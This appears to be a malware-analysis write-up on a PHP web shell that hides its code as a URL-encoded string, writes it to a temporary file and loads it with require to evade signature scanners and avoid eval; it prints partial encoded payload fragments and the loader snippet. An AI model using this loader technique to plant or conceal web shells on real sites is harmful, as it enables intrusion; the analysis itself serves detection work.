This PHP web shell used an obfuscation method where the web shell code was stored in URL encoded format and assigned to the variable $i.

   $i = rawurldecode("%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20htm

While URL encoding doesn’t change the actual function names of the web shell code, it changes the following characters in the web shell code to use their hexadecimal representations (like %21 is for exclamation point!):

(  )  ;  :  @  &  =  +  $  ,  /  ?  #  [  ]

This can be enough to evade some malware scanners that just use signature based detection. The signatures used by the malware scanners may not account for the fact that someone has replace ASCII characters with their hexadecimal values. It also avoids using certain suspicious functions like eval.

The PHP web shell code stored in $i still needs to be executed or else nothing will happen when the file is loaded. To do this the file uses a PHP function named tempname which creates a unique filename in the temporary directory (/tmp), then writes the PHP web shell code from $i to the created unique file. This unique file in /tmp is then loaded by using the PHP function require and then after it is loaded it is removed using the function unlink:

   function x($i)
   	$t = tempnam("/tmp", "0");
   	$h = fopen($t, "w+");
   	fwrite($h, $i);
   	require $t;
   	return get_defined_vars();

The use of require/require_once or include/include_once as a way to avoid using the eval function has seemed to increase over the last few years.

   $i = rawurldecode("%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en-US%22%3E%0A%0A%09%09%20%3Chead%3E%0A%09%09%09%20%3Cmeta%20cha");

   function x($i)
       $t = tempnam("/tmp", "0");
       $h = fopen($t, "w+");
       fwrite($h, $i);
       require $t;
       return get_defined_vars();